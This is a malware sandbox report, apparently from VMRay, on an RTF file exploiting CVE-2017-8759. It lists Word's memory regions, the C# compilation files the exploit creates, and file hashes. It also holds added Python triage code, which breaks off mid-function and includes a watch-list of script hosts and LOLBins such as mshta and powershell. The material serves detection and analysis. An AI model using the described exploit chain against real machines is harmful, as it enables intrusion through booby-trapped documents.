RTF Doc. Uses CVE-2017-8759 Exploit to Execute Code | Sequential Behavior
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
(Host: 244, Network: 20)
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:02:05
OS Process Information
Information Value
PID 0x9b0
Parent PID 0x52c (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xA68, 0xA64, 0xA54, 0xA30, 0xA2C, 0xA28, 0xA24, 0xA20, 0x9F4, 0x9DC, 0x9D0, 0x9CC, 0x9C4, 0x9BC, 0x9B4, 0xB04, 0xB08, 0xB0C, 0xB18, 0xB24, 0xB28, 0xB2C, 0xB54, 0xB58, 0xB5C, 0x0, 0xB60, 0xB64, 0xB68, 0xBD0, 0xBD4, 0x95C
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000040000 0x00040000 0x00043fff Pagefile Backed Memory Readable False False False
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable False False False
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable False False False
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable False False False
pagefile_0x0000000000180000 0x00180000 0x00180fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable False False False
locale.nls 0x00290000 0x002f6fff Memory Mapped File Readable False False False
pagefile_0x0000000000300000 0x00300000 0x00306fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000310000 0x00310000 0x00311fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000320000 0x00320000 0x00320fff Private Memory Readable, Writable False False False
private_0x0000000000330000 0x00330000 0x00330fff Private Memory Readable, Writable False False False
pagefile_0x0000000000340000 0x00340000 0x00341fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000350000 0x00350000 0x00351fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000360000 0x00360000 0x00362fff Pagefile Backed Memory Readable False False False
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory - False False False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory Readable, Writable False False False
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000490000 0x00490000 0x00617fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000620000 0x00620000 0x007a0fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000007b0000 0x007b0000 0x01baffff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x01bb0000 0x01e7efff Memory Mapped File Readable False False False
pagefile_0x0000000001e80000 0x01e80000 0x02272fff Pagefile Backed Memory Readable False False False
private_0x0000000002280000 0x02280000 0x0237ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002380000 0x02380000 0x02382fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002390000 0x02390000 0x02392fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023a0000 0x023a0000 0x023a2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023b0000 0x023b0000 0x023b2fff Pagefile Backed Memory Readable False False False
private_0x00000000023c0000 0x023c0000 0x023fffff Private Memory Readable, Writable False False False
private_0x0000000002400000 0x02400000 0x02407fff Private Memory Readable, Writable False False False
pagefile_0x0000000002410000 0x02410000 0x02411fff Pagefile Backed Memory Readable False False False
kernelbase.dll.mui 0x02420000 0x024dffff Memory Mapped File Readable, Writable False False False
private_0x00000000024e0000 0x024e0000 0x024e0fff Private Memory Readable, Writable False False False
private_0x00000000024f0000 0x024f0000 0x0256ffff Private Memory Readable, Writable False False False
private_0x0000000002570000 0x02570000 0x02570fff Private Memory Readable, Writable False False False
private_0x0000000002580000 0x02580000 0x02580fff Private Memory Readable, Writable False False False
private_0x0000000002590000 0x02590000 0x02590fff Private Memory Readable, Writable False False False
private_0x0000000002590000 0x02590000 0x0259efff Private Memory Readable, Writable True True False
private_0x00000000025a0000 0x025a0000 0x025a0fff Private Memory Readable, Writable False False False
private_0x00000000025b0000 0x025b0000 0x025bffff Private Memory Readable, Writable False False False
pagefile_0x00000000025c0000 0x025c0000 0x0269efff Pagefile Backed Memory Readable False False False
private_0x00000000026a0000 0x026a0000 0x026c7fff Private Memory Readable, Writable False False False
private_0x00000000026d0000 0x026d0000 0x0273afff Private Memory Readable, Writable False False False
private_0x0000000002720000 0x02720000 0x02721fff Private Memory Readable, Writable True True False
pagefile_0x0000000002740000 0x02740000 0x02744fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002750000 0x02750000 0x02750fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002760000 0x02760000 0x02760fff Pagefile Backed Memory Readable False False False
private_0x0000000002770000 0x02770000 0x02770fff Private Memory Readable, Writable False False False
pagefile_0x0000000002780000 0x02780000 0x02781fff Pagefile Backed Memory Readable False False False
private_0x0000000002790000 0x02790000 0x0279ffff Private Memory Readable, Writable False False False
devobj.dll 0x027a0000 0x027b9fff Memory Mapped File Readable, Writable, Executable False False False
msxml6r.dll 0x027c0000 0x027c0fff Memory Mapped File Readable False False False
pagefile_0x00000000027d0000 0x027d0000 0x027d0fff Pagefile Backed Memory Readable, Writable False False False
private_0x00000000027e0000 0x027e0000 0x028dffff Private Memory Readable, Writable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db 0x028e0000 0x028fefff Memory Mapped File Readable False False False
private_0x0000000002900000 0x02900000 0x02900fff Private Memory Readable, Writable False False False
private_0x0000000002910000 0x02910000 0x0298ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002990000 0x02990000 0x02991fff Pagefile Backed Memory Readable False False False
c_1255.nls 0x029a0000 0x029b0fff Memory Mapped File Readable False False False
private_0x00000000029d0000 0x029d0000 0x029dffff Private Memory Readable, Writable False False False
segoeuil.ttf 0x029e0000 0x02a30fff Memory Mapped File Readable False False False
private_0x0000000002a10000 0x02a10000 0x02a10fff Private Memory Readable, Writable True True False
private_0x0000000002a20000 0x02a20000 0x02a20fff Private Memory Readable, Writable True True False
private_0x0000000002a20000 0x02a20000 0x02a3efff Private Memory Readable, Writable True True False
private_0x0000000002a30000 0x02a30000 0x02a30fff Private Memory Readable, Writable True True False
private_0x0000000002a50000 0x02a50000 0x02b4ffff Private Memory Readable, Writable False False False
private_0x0000000002b50000 0x02b50000 0x02b6ffff Private Memory - False False False
private_0x0000000002b80000 0x02b80000 0x02c7ffff Private Memory Readable, Writable False False False
private_0x0000000002c70000 0x02c70000 0x02c70fff Private Memory Readable, Writable True True False
private_0x0000000002c80000 0x02c80000 0x02e7ffff Private Memory Readable, Writable False False False
private_0x0000000002e80000 0x02e80000 0x02fb1fff Private Memory Readable, Writable False False False
private_0x0000000002e80000 0x02e80000 0x02f7ffff Private Memory Readable, Writable True True False
private_0x0000000002f80000 0x02f80000 0x02f80fff Private Memory Readable, Writable True True False
private_0x0000000002f90000 0x02f90000 0x02f90fff Private Memory Readable, Writable True True False
private_0x0000000002fa0000 0x02fa0000 0x02fa0fff Private Memory Readable, Writable True True False
private_0x0000000002fa0000 0x02fa0000 0x02faffff Private Memory Readable, Writable True True False
private_0x0000000002fb0000 0x02fb0000 0x02fb0fff Private Memory Readable, Writable True True False
private_0x0000000002fc0000 0x02fc0000 0x030bffff Private Memory Readable, Writable False False False
private_0x00000000030c0000 0x030c0000 0x030defff Private Memory Readable, Writable False False False
private_0x00000000030e0000 0x030e0000 0x031dffff Private Memory Readable, Writable False False False
private_0x00000000031e0000 0x031e0000 0x032dffff Private Memory Readable, Writable False False False
private_0x00000000032e0000 0x032e0000 0x033dffff Private Memory Readable, Writable False False False
pagefile_0x00000000033e0000 0x033e0000 0x03bdffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000003be0000 0x03be0000 0x03ddffff Private Memory Readable, Writable False False False
staticcache.dat 0x03de0000 0x0470ffff Memory Mapped File Readable False False False
segoeui.ttf 0x04710000 0x0478efff Memory Mapped File Readable False False False
private_0x0000000004790000 0x04790000 0x04790fff Private Memory Readable, Writable True True False
private_0x00000000047a0000 0x047a0000 0x0489ffff Private Memory Readable, Writable False False False
private_0x00000000048a0000 0x048a0000 0x0499ffff Private Memory Readable, Writable False False False
private_0x00000000049a0000 0x049a0000 0x049a0fff Private Memory Readable, Writable True True False
private_0x00000000049b0000 0x049b0000 0x04aaffff Private Memory Readable, Writable False False False
private_0x0000000004ab0000 0x04ab0000 0x04acffff Private Memory - False False False
private_0x0000000004af0000 0x04af0000 0x04beffff Private Memory Readable, Writable False False False
seguisb.ttf 0x04bf0000 0x04c53fff Memory Mapped File Readable False False False
private_0x0000000004c60000 0x04c60000 0x04c6ffff Private Memory Readable, Writable False False False
private_0x0000000004c90000 0x04c90000 0x04c90fff Private Memory Readable, Writable True True False
private_0x0000000004ca0000 0x04ca0000 0x04ca0fff Private Memory Readable, Writable True True False
private_0x0000000004cb0000 0x04cb0000 0x04cb0fff Private Memory Readable, Writable True True False
private_0x0000000004cc0000 0x04cc0000 0x04cc0fff Private Memory Readable, Writable True True False
private_0x0000000004cd0000 0x04cd0000 0x04dcffff Private Memory Readable, Writable False False False
private_0x0000000004dd0000 0x04dd0000 0x04dd0fff Private Memory Readable, Writable True True False
private_0x0000000004de0000 0x04de0000 0x04de0fff Private Memory Readable, Writable True True False
private_0x0000000004df0000 0x04df0000 0x04df0fff Private Memory Readable, Writable True True False
private_0x0000000004e00000 0x04e00000 0x04e7ffff Private Memory Readable, Writable, Executable False False False
pagefile_0x0000000004e80000 0x04e80000 0x0567ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000005680000 0x05680000 0x05680fff Private Memory Readable, Writable True True False
private_0x0000000005690000 0x05690000 0x05690fff Private Memory Readable, Writable True True False
private_0x00000000056a0000 0x056a0000 0x056a0fff Private Memory Readable, Writable True True False
private_0x00000000056b0000 0x056b0000 0x056b0fff Private Memory Readable, Writable True True False
private_0x00000000056c0000 0x056c0000 0x056c0fff Private Memory Readable, Writable True True False
private_0x00000000056d0000 0x056d0000 0x056d0fff Private Memory Readable, Writable True True False
private_0x00000000056e0000 0x056e0000 0x057dffff Private Memory Readable, Writable False False False
private_0x00000000057e0000 0x057e0000 0x058dffff Private Memory Readable, Writable False False False
private_0x00000000058e0000 0x058e0000 0x058e0fff Private Memory Readable, Writable True True False
private_0x00000000058e0000 0x058e0000 0x058fefff Private Memory Readable, Writable True True False
private_0x00000000058f0000 0x058f0000 0x058f0fff Private Memory Readable, Writable True True False
private_0x0000000005900000 0x05900000 0x05900fff Private Memory Readable, Writable True True False
private_0x0000000005910000 0x05910000 0x05910fff Private Memory Readable, Writable True True False
private_0x0000000005920000 0x05920000 0x05920fff Private Memory Readable, Writable True True False
private_0x0000000005930000 0x05930000 0x059affff Private Memory Readable, Writable False False False
private_0x00000000059b0000 0x059b0000 0x059b0fff Private Memory Readable, Writable True True False
private_0x00000000059c0000 0x059c0000 0x059c0fff Private Memory Readable, Writable True True False
private_0x00000000059d0000 0x059d0000 0x05a4ffff Private Memory Readable, Writable False False False
private_0x0000000005a50000 0x05a50000 0x05a50fff Private Memory Readable, Writable True True False
private_0x0000000005a50000 0x05a50000 0x05a6efff Private Memory Readable, Writable True True False
private_0x0000000005a60000 0x05a60000 0x05a60fff Private Memory Readable, Writable True True False
private_0x0000000005a70000 0x05a70000 0x05a70fff Private Memory Readable, Writable True True False
private_0x0000000005a80000 0x05a80000 0x05a8ffff Private Memory Readable, Writable False False False
private_0x0000000005a90000 0x05a90000 0x05e8ffff Private Memory Readable, Writable False False False
pagefile_0x0000000005e90000 0x05e90000 0x06e8ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006e90000 0x06e90000 0x06e90fff Private Memory Readable, Writable True True False
private_0x0000000006e90000 0x06e90000 0x06eb0fff Private Memory Readable, Writable True True False
private_0x0000000006ea0000 0x06ea0000 0x06ea0fff Private Memory Readable, Writable True True False
private_0x0000000006eb0000 0x06eb0000 0x06eb0fff Private Memory Readable, Writable True True False
private_0x0000000006ec0000 0x06ec0000 0x06ec0fff Private Memory Readable, Writable True True False
arial.ttf 0x06f40000 0x06ffcfff Memory Mapped File Readable False False False
private_0x0000000007000000 0x07000000 0x0701efff Private Memory Readable, Writable True True False
private_0x0000000007030000 0x07030000 0x070affff Private Memory Readable, Writable False False False
private_0x00000000070b0000 0x070b0000 0x074affff Private Memory Readable, Writable False False False
private_0x00000000075b0000 0x075b0000 0x076affff Private Memory Readable, Writable False False False
private_0x00000000076b0000 0x076b0000 0x07eaffff Private Memory Readable, Writable False False False
private_0x0000000007eb0000 0x07eb0000 0x082b0fff Private Memory Readable, Writable False False False
private_0x00000000082c0000 0x082c0000 0x086c0fff Private Memory Readable, Writable False False False
private_0x00000000086d0000 0x086d0000 0x08ad0fff Private Memory Readable, Writable False False False
private_0x0000000008ae0000 0x08ae0000 0x08f9ffff Private Memory Readable, Writable False False False
private_0x0000000008fa0000 0x08fa0000 0x0939ffff Private Memory Readable, Writable False False False
private_0x0000000009400000 0x09400000 0x0941ffff Private Memory - True True False
private_0x0000000009530000 0x09530000 0x0962ffff Private Memory Readable, Writable False False False
private_0x00000000099b0000 0x099b0000 0x09aaffff Private Memory Readable, Writable True True False
private_0x0000000009ee0000 0x09ee0000 0x09fdffff Private Memory Readable, Writable True True False
private_0x0000000009fe0000 0x09fe0000 0x0a0dffff Private Memory Readable, Writable True True False
private_0x000000000a130000 0x0a130000 0x0a1affff Private Memory Readable, Writable True True False
private_0x000000000a320000 0x0a320000 0x0a39ffff Private Memory Readable, Writable, Executable True True False
private_0x000000000a3a0000 0x0a3a0000 0x0a4a0fff Private Memory Readable, Writable True True False
private_0x000000000a570000 0x0a570000 0x0a57ffff Private Memory Readable, Writable True True False
private_0x0000000022580000 0x22580000 0x22c4ffff Private Memory Readable, Writable True True False
private_0x00000000230b0000 0x230b0000 0x231affff Private Memory Readable, Writable True True False
private_0x00000000231b0000 0x231b0000 0x2341ffff Private Memory Readable, Writable True True False
private_0x00000000233a0000 0x233a0000 0x2341ffff Private Memory Readable, Writable True True False
private_0x0000000023740000 0x23740000 0x2394ffff Private Memory Readable, Writable True True False
private_0x00000000375f0000 0x375f0000 0x375fffff Private Memory Readable, Writable, Executable False False False
private_0x000000006fff0000 0x6fff0000 0x6fffffff Private Memory Readable, Writable, Executable False False False
osppc.dll 0x74d60000 0x74d92fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x775e0000 0x776d9fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x779d0000 0x779d6fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable False False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable False False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable False False False
winword.exe 0x13f660000 0x13f83afff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007febe310000 0x7febe310000 0x7febe31ffff Private Memory Readable, Writable, Executable False False False
chart.dll 0x7fee4420000 0x7fee4f18fff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x7fee4f20000 0x7fee5142fff Memory Mapped File Readable, Writable, Executable False False False
dwrite.dll 0x7fee5390000 0x7fee550dfff Memory Mapped File Readable, Writable, Executable False False False
d3d10warp.dll 0x7fee5510000 0x7fee56dffff Memory Mapped File Readable, Writable, Executable False False False
msptls.dll 0x7fee56e0000 0x7fee584ffff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x7fee5850000 0x7fee59cafff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x7fee59d0000 0x7feea80efff Memory Mapped File Readable, Writable, Executable False False False
mso99lres.dll 0x7feea810000 0x7feeb130fff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x7feeb140000 0x7feec41bfff Memory Mapped File Readable, Writable, Executable False False False
mso99lwin32client.dll 0x7feec420000 0x7feecbebfff Memory Mapped File Readable, Writable, Executable False False False
mso40uiwin32client.dll 0x7feecbf0000 0x7feed4dafff Memory Mapped File Readable, Writable, Executable False False False
mso30win32client.dll 0x7feed4e0000 0x7feed957fff Memory Mapped File Readable, Writable, Executable False False False
mso20win32client.dll 0x7feed960000 0x7feedc63fff Memory Mapped File Readable, Writable, Executable False False False
oart.dll 0x7feedc70000 0x7feeeddbfff Memory Mapped File Readable, Writable, Executable False False False
d3d11.dll 0x7feeede0000 0x7feeeea5fff Memory Mapped File Readable, Writable, Executable False False False
wwlib.dll 0x7feeeeb0000 0x7fef124efff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x7fef13f0000 0x7fef1488fff Memory Mapped File Readable, Writable, Executable False False False
mso40uires.dll 0x7fef1490000 0x7fef1797fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x7fef1910000 0x7fef197efff Memory Mapped File Readable, Writable, Executable False False False
wwintl.dll 0x7fef1980000 0x7fef1a3bfff Memory Mapped File Readable, Writable, Executable False False False
mlang.dll 0x7fef1aa0000 0x7fef1adafff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x7fef3c70000 0x7fef3c7bfff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x7fef4210000 0x7fef4280fff Memory Mapped File Readable, Writable, Executable False False False
msxml6.dll 0x7fef49b0000 0x7fef4ba1fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l1-2-0.dll 0x7fef5310000 0x7fef5312fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-processthreads-l1-1-1.dll 0x7fef5320000 0x7fef5322fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-synch-l1-2-0.dll 0x7fef5330000 0x7fef5332fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-localization-l1-2-0.dll 0x7fef5370000 0x7fef5372fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l2-1-0.dll 0x7fef5380000 0x7fef5382fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-timezone-l1-1-0.dll 0x7fef5550000 0x7fef5552fff Memory Mapped File Readable, Writable, Executable False False False
ucrtbase.dll 0x7fef55a0000 0x7fef5691fff Memory Mapped File Readable, Writable, Executable False False False
msimg32.dll 0x7fef5850000 0x7fef5856fff Memory Mapped File Readable, Writable, Executable False False False
c2r64.dll 0x7fef5860000 0x7fef5988fff Memory Mapped File Readable, Writable, Executable False False False
appvisvstream64.dll 0x7fef5990000 0x7fef5a09fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007ff00050000 0x7ff00050000 0x7ff0005ffff Private Memory - True True False
private_0x000007ff00100000 0x7ff00100000 0x7ff0010ffff Private Memory - True True False
private_0x000007ff00110000 0x7ff00110000 0x7ff0017ffff Private Memory - True True False
private_0x000007ff00180000 0x7ff00180000 0x7ff0018ffff Private Memory - True True False
private_0x000007ff00190000 0x7ff00190000 0x7ff0019ffff Private Memory - True True False
private_0x000007ffffec0000 0x7ffffec0000 0x7ffffecffff Private Memory Readable, Writable, Executable True True False
private_0x000007ffffed0000 0x7ffffed0000 0x7fffff5ffff Private Memory Readable, Writable, Executable True True False
private_0x000007fffff66000 0x7fffff66000 0x7fffff67fff Private Memory Readable, Writable True True False
private_0x000007fffff68000 0x7fffff68000 0x7fffff69fff Private Memory Readable, Writable True True False
private_0x000007fffff6a000 0x7fffff6a000 0x7fffff6bfff Private Memory Readable, Writable True True False
private_0x000007fffff6c000 0x7fffff6c000 0x7fffff6dfff Private Memory Readable, Writable True True False
private_0x000007fffff6e000 0x7fffff6e000 0x7fffff6ffff Private Memory Readable, Writable True True False
private_0x000007fffff70000 0x7fffff70000 0x7fffff71fff Private Memory Readable, Writable True True False
private_0x000007fffff72000 0x7fffff72000 0x7fffff73fff Private Memory Readable, Writable True True False
private_0x000007fffff74000 0x7fffff74000 0x7fffff75fff Private Memory Readable, Writable True True False
private_0x000007fffff76000 0x7fffff76000 0x7fffff77fff Private Memory Readable, Writable True True False
private_0x000007fffff78000 0x7fffff78000 0x7fffff79fff Private Memory Readable, Writable True True False
private_0x000007fffff7a000 0x7fffff7a000 0x7fffff7bfff Private Memory Readable, Writable True True False
For performance reasons, the remaining 264 entries are omitted.
The remaining entries can be found in flog.txt.
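A memory map of this size is easier to triage mechanically than by eye. In this report format image mappings (Memory Mapped File) are listed as Readable, Writable, Executable as a matter of course, so the rows that matter are Private Memory regions that are both writable and executable, which is where a .NET JIT stub or shellcode lives; of those, the rows with Dump = True (for example 0x0a320000-0x0a39ffff above) have an artifact that can be scanned offline. The parser below is an added example written for this page, not VMRay code; the sample rows are a constructed subset copied from the table above, and the column order is assumed to be the one in the table header.

```python
import re
from dataclasses import dataclass

# Constructed sample: six rows copied from the region table above (the real table has
# hundreds of rows; the column layout is assumed to be the one in its header).
SAMPLE_ROWS = """\
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory - False False False
private_0x0000000004e00000 0x04e00000 0x04e7ffff Private Memory Readable, Writable, Executable False False False
private_0x000000000a320000 0x0a320000 0x0a39ffff Private Memory Readable, Writable, Executable True True False
private_0x000000000a3a0000 0x0a3a0000 0x0a4a0fff Private Memory Readable, Writable True True False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007ffffed0000 0x7ffffed0000 0x7fffff5ffff Private Memory Readable, Writable, Executable True True False
"""

ROW_RE = re.compile(
    r"^(?P<name>\S+)\s+0x(?P<start>[0-9a-fA-F]+)\s+0x(?P<end>[0-9a-fA-F]+)\s+"
    r"(?P<kind>Private Memory|Pagefile Backed Memory|Memory Mapped File)\s+"
    r"(?P<perms>.+?)\s+(?P<monitored>True|False)\s+(?P<dump>True|False)\s+(?P<yara>True|False)$")


@dataclass(frozen=True)
class Region:
    name: str
    start: int
    end: int
    kind: str
    perms: frozenset
    monitored: bool
    dumped: bool
    yara_match: bool

    @property
    def size(self):
        return self.end - self.start + 1

    @property
    def writable(self):
        return "Writable" in self.perms

    @property
    def executable(self):
        return "Executable" in self.perms


def parse_regions(text):
    """Parse report rows; '-' in the permissions column means no access (reserved/guard pages)."""
    regions = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        perms = frozenset() if m["perms"] == "-" else frozenset(
            p.strip() for p in m["perms"].split(","))
        regions.append(Region(
            m["name"], int(m["start"], 16), int(m["end"], 16), m["kind"], perms,
            m["monitored"] == "True", m["dump"] == "True", m["yara"] == "True"))
    return regions


def suspicious_regions(regions):
    """Private, writable and executable memory: where shellcode, unpacked stages and JIT
    stubs live. Image mappings (Memory Mapped File) show as RWX in this format and are
    expected, so they are not flagged. Dumped regions come first (an artifact exists to
    scan), then larger regions."""
    hits = [r for r in regions
            if r.kind == "Private Memory" and r.writable and r.executable]
    return sorted(hits, key=lambda r: (not r.dumped, -r.size))


def summarize(regions):
    """Counts for a one-line triage verdict: total rows, private RWX rows, dumped private RWX rows."""
    sus = suspicious_regions(regions)
    return {"regions": len(regions), "private_rwx": len(sus),
            "private_rwx_dumped": sum(1 for r in sus if r.dumped)}


if __name__ == "__main__":
    regs = parse_regions(SAMPLE_ROWS)
    print(summarize(regs))
    for r in suspicious_regions(regs):
        print(f"{r.start:#014x}-{r.end:#014x} {r.size:#9x} dumped={r.dumped} {r.name}")
```

Run it over the full region table (or flog.txt) instead of the sample and the dumped private RWX regions are the ones worth feeding to a disassembler or YARA first; the YARA Match column in this report is False for every row, so the dumps were not matched by the sandbox's own rules.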
Created Files
Filename File Size Hash Values YARA Match
c:\users\aetadzjz\desktop\logo.cs 1.07 KB (1098 bytes)
MD5: 667a8968a36880dc4147d2ce00c64b30
SHA1: 48233228f9babdd3bcac5b85d5ae258f91204f7e
SHA256: 8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd
YARA Match: False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.tmp 0.00 KB (0 bytes)
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
YARA Match: False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.err 0.00 KB (0 bytes)
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
YARA Match: False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.0.cs 1.08 KB (1101 bytes)
MD5: 3992ea6c0751d769815a98c4cffcadce
SHA1: 6ba244d7eb6a6facd2b4c4e946e26987d2336e8b
SHA256: b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc
YARA Match: False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.cmdline 0.28 KB (288 bytes)
MD5: 8d42a6a6ddda3cb8546ef4cb888dbfa8
SHA1: 2024365b4311bc93867119ceee7c876683fef607
SHA256: f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e
YARA Match: False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.out 0.37 KB (379 bytes)
MD5: 51bfb6f473aa25324ee1ed9830ca806e
SHA1: f1fae130030df5b4dff15ed820ca35665886ea98
SHA256: 60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e
YARA Match: False
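The created-file set is the footprint of a runtime C# compilation: when System.CodeDom drives csc.exe it writes %TEMP%\<random>.cmdline (the compiler arguments), <random>.0.cs (the source), <random>.out and <random>.err (captured compiler output) and <random>.tmp, all on one random stem, here 91rxrejg. That is exactly what the .NET WSDL parser does in CVE-2017-8759 once the SOAP moniker in the RTF has fetched a malicious WSDL, and the loose logo.cs next to the opened document is a second C# source of almost the same size. Together with winword.exe successfully creating mshta.exe (Thread 0x9b4, below) this gives a small triage rule. The following is an added example, not VMRay's own detection logic: the inputs are constructed from the report's own file paths and its one Process Create row, the parent image name is taken from the process header above, and the lists of Office parents and script-host children are this example's assumption.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample input: the six "Created Files" paths and the single successful
# "Process Create" operation from this report, paired with the parent image name.
CREATED_FILES = [
    r"c:\users\aetadzjz\desktop\logo.cs",
    r"c:\users\aetadzjz\appdata\local\temp\91rxrejg.tmp",
    r"c:\users\aetadzjz\appdata\local\temp\91rxrejg.err",
    r"c:\users\aetadzjz\appdata\local\temp\91rxrejg.0.cs",
    r"c:\users\aetadzjz\appdata\local\temp\91rxrejg.cmdline",
    r"c:\users\aetadzjz\appdata\local\temp\91rxrejg.out",
]
PROCESS_OPS = [
    ("winword.exe",
     "Process Create process_name = C:\\Windows\\System32\\mshta.exe, "
     "show_window = SW_SHOWNORMAL True 1"),
]

# Assumed watch-lists (not from the report): Office parents and the script/LOLBin
# children an Office process has no business launching.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "csc.exe"}

# Suffixes System.CodeDom leaves in %TEMP% on one random stem when it drives csc.exe.
CSC_SUFFIXES = (".0.cs", ".cmdline", ".out", ".err", ".tmp")

PROC_CREATE_RE = re.compile(
    r"Process Create process_name = (?P<image>[^,]+),.*\s(?P<success>True|False)\s+\d+$")


def csc_artifact(path):
    """Return (stem, suffix) for a CodeDom/csc temp artifact, else None."""
    name = PureWindowsPath(path.lower()).name
    for suffix in CSC_SUFFIXES:
        if name.endswith(suffix) and len(name) > len(suffix):
            return name[:-len(suffix)], suffix
    return None


def find_runtime_compilations(paths):
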